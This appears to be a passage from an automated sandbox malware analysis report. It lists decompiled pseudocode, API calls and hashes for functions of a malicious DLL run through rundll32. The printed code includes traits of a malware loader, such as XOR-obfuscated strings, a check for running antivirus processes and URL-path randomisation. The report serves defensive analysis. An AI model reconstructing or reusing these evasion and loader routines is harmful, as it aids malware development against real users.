                                          				_t58 = E04359D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}














                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04358F1E
                                          • GetLastError.KERNEL32 ref: 04358F37
                                            • Part of subcall function 04359D3A: WaitForMultipleObjects.KERNEL32(00000002,0435AA33,00000000,0435AA33,?,?,?,0435AA33,0000EA60), ref: 04359D55
                                          • ResetEvent.KERNEL32(?), ref: 04358FB0
                                          • GetLastError.KERNEL32 ref: 04358FCB
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 1172ea4aea1a44cc57bef1bb39a5d67c512948ae1454dc72801b17ceceae1550
                                          • Instruction ID: 5473244404a55e58b0b6ac97aa4b2bee1ffe3c913af8037c967d520b9e17d928
                                          • Opcode Fuzzy Hash: 1172ea4aea1a44cc57bef1bb39a5d67c512948ae1454dc72801b17ceceae1550
                                          • Instruction Fuzzy Hash: 24318172A00604EBDB219FA4CC44F6E77BDEF8C364F155928E951A71A0EB70F9419B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E043572F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x435d270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x435d2a4; // 0x251a5a8
                                          				_t3 = _t8 + 0x435e836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04356AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x435d2a8, 1, 0, _t30);
                                          					E0435147E(_t30);
                                          				}
                                          				_t12 =  *0x435d25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E043556A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E04351493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x435d110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E04357827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}














                                          APIs
                                            • Part of subcall function 04356AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04352098,74666F53,00000000,?,0435D00C,?,?), ref: 04356B2D
                                            • Part of subcall function 04356AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04356B51
                                            • Part of subcall function 04356AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04356B59
                                          • CreateEventA.KERNEL32(0435D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 04357333
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0435555B,00000000,00000000,?,00000000,?,0435555B,?,?,?), ref: 04357393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 043573C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 043573D9
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: e797d3c765af53368d57eb7834feb915374c6273948e9332acadc1e7352b8e8a
                                          • Instruction ID: 6c774b48018a67507f3d02bc74ddc86a1b14cc0d3982a8727655632945f32d7c
                                          • Opcode Fuzzy Hash: e797d3c765af53368d57eb7834feb915374c6273948e9332acadc1e7352b8e8a
                                          • Instruction Fuzzy Hash: 2A21EE726003429BDB315E68A884E6F73ADEF88B24F067235FD15DB160DB64E80186D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E0435A1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x435d140; // 0x435ad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E043558BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E0435147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E04359D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0435A208
                                          • SetEvent.KERNEL32(?), ref: 0435A218
                                          • GetLastError.KERNEL32 ref: 0435A2A1
                                            • Part of subcall function 04359D3A: WaitForMultipleObjects.KERNEL32(00000002,0435AA33,00000000,0435AA33,?,?,?,0435AA33,0000EA60), ref: 04359D55
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • GetLastError.KERNEL32(00000000), ref: 0435A2D6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: e42007504d24719c61248e5711a6b49b0e25787efbc4afea7699a4037ada72c5
                                          • Instruction ID: b1c6a9e321d659fc32b65f0f0afde66756efeccdd2015e63ea98fa5859f69e31
                                          • Opcode Fuzzy Hash: e42007504d24719c61248e5711a6b49b0e25787efbc4afea7699a4037ada72c5
                                          • Instruction Fuzzy Hash: C63145B5A00308EFDB20EFE5D881DAEBBFCEF08304F109669D942A2551D735EA45AF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E043554AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E04354F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E04355749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E04359138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x435d2a8, 1, 0,  *0x435d340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E04359575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E0435A642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E0435568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E043572F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(0435D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 043554FD
                                          • SetEvent.KERNEL32(00000000), ref: 0435550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04355515
                                          • CloseHandle.KERNEL32(00000000), ref: 0435551C
                                            • Part of subcall function 04359575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0435553C,?,0435553C,?,?,?,?,?,0435553C,?), ref: 0435964F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: f3382ed268036168da4ffc18f88004020b6508042f607b96a41aaddb4ecf7475
                                          • Instruction ID: 1ea09d98fb196954eafffbfe29b2686d9f3e86a280dba7ca043fd742bf742ebe
                                          • Opcode Fuzzy Hash: f3382ed268036168da4ffc18f88004020b6508042f607b96a41aaddb4ecf7475
                                          • Instruction Fuzzy Hash: 87215372D00215BBDB10BFE4D884DAE77AEEF48354F05A825EE12A7114D674FA418FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04354858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x435d238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x435d250; // 0xd5235b88
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x435d250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04354DBF,00000000,?,?,043552FE,?,068795B0), ref: 04354863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0435487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04354DBF,00000000,?,?,043552FE,?,068795B0), ref: 043548BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 043548E0
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: bb280c8dea89d79bcb4f35951c673c853622111285037c534e996b75e41ceb4b
                                          • Instruction ID: bfbe75bd27b312847690d0e117e67571334a9eed17956f2cbd15b7ee9da7d21e
                                          • Opcode Fuzzy Hash: bb280c8dea89d79bcb4f35951c673c853622111285037c534e996b75e41ceb4b
                                          • Instruction Fuzzy Hash: 6D110672A00214AFD314CE69DC85EAEBBEEEB94360F055176F904DB150E774EE40C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E04356AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E04356F89(_t8, _t1);
                                          				_t16 = E043558BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E04359038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E043558BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E0435147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                            • Part of subcall function 04359038: wsprintfA.USER32 ref: 04359094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04352098,74666F53,00000000,?,0435D00C,?,?), ref: 04356B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04356B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 5d3bbe833364d8ba0bee4876afd2aa944c1823957aaad64d1f7e94be1599b969
                                          • Instruction ID: f6ea470910a3463ae1bb24e746be15c18ba334c00975e7636770b083b248c013
                                          • Opcode Fuzzy Hash: 5d3bbe833364d8ba0bee4876afd2aa944c1823957aaad64d1f7e94be1599b969
                                          • Instruction Fuzzy Hash: BB01D672600205BBDB122BA9DC88EFF7BACEF84359F046420FE1856124DB78E94587E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E043556A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x435d2a4; // 0x251a5a8
                                          						_t2 = _t9 + 0x435ee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x435d0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 043556B2
                                          • Process32First.KERNEL32(00000000,?), ref: 043556C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 043556F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04355700
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 8de6769bfc809e05fc6cf85636d91026c23d0ce46ec0735d6f385d2f9b4093c7
                                          • Instruction ID: 3b0c4f494d550b6b634cd22ce3f6c25ad6a2ccb0bc7ce7a7dc5fc12343e64b9a
                                          • Opcode Fuzzy Hash: 8de6769bfc809e05fc6cf85636d91026c23d0ce46ec0735d6f385d2f9b4093c7
                                          • Instruction Fuzzy Hash: F7F02B726011657BF720BA369C09EEF76ACDFC9354F003051ED05C3054FA24FA468AA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04357283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 04357291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 043572A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 043572B3
                                          • CloseHandle.KERNEL32(?), ref: 043572C5
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: f7ec7b8d21e05e12e1a1c7ab3d864a9fccd770a06b2e01fe2324c05a00948a6e
                                          • Instruction ID: 2b0e96b5d2c94f90889ae794a0ea321e42065c532bd0cb707ad187219bd69a37
                                          • Opcode Fuzzy Hash: f7ec7b8d21e05e12e1a1c7ab3d864a9fccd770a06b2e01fe2324c05a00948a6e
                                          • Instruction Fuzzy Hash: A0F0FEB1104708BFD310AF66ECC4C27BBACEB552A8F11A92EF54282511D676E8054A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0435A2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E043558BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04359AA8,00000000,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0435A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 0435A31B
                                          • memset.NTDLL ref: 0435A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: cbe1300c1fa3783f61826dbaf412d851a3ddac97dbda1f2801154acf21d71317
                                          • Instruction ID: c3454122ddd3ecd15e2de1905b2494ca318032f338558273a7a392c3ad92bc68
                                          • Opcode Fuzzy Hash: cbe1300c1fa3783f61826dbaf412d851a3ddac97dbda1f2801154acf21d71317
                                          • Instruction Fuzzy Hash: 13E0E573A053116BD630A9B95C88D4F6A9CEFD8264B001935FD15C7214E620EC04C2B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E04354C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x435d324; // 0x68795b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x435d324; // 0x68795b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x435d030) {
                                          					HeapFree( *0x435d238, 0, _t8);
                                          				}
                                          				_t14[1] = E04357C75(_v0, _t14);
                                          				_t11 =  *0x435d324; // 0x68795b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04354C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04354C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04354C75
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 04354C91
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 799ef17225ae6e306aec687b45a7c9624eb5e92bceaa5de87f160fef2dc905cd
                                          • Instruction ID: 8e654373979192f7ee86c139af56e3dfd924920250c48752a5a733aa5ceea9a6
                                          • Opcode Fuzzy Hash: 799ef17225ae6e306aec687b45a7c9624eb5e92bceaa5de87f160fef2dc905cd
                                          • Instruction Fuzzy Hash: 7BF0FE70600740ABE7149F68EA48F2A77FCEF68748F04B508F902D7261D728EC80CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E043578AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x435d26c; // 0x3d0
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x435d2b8; // 0x0
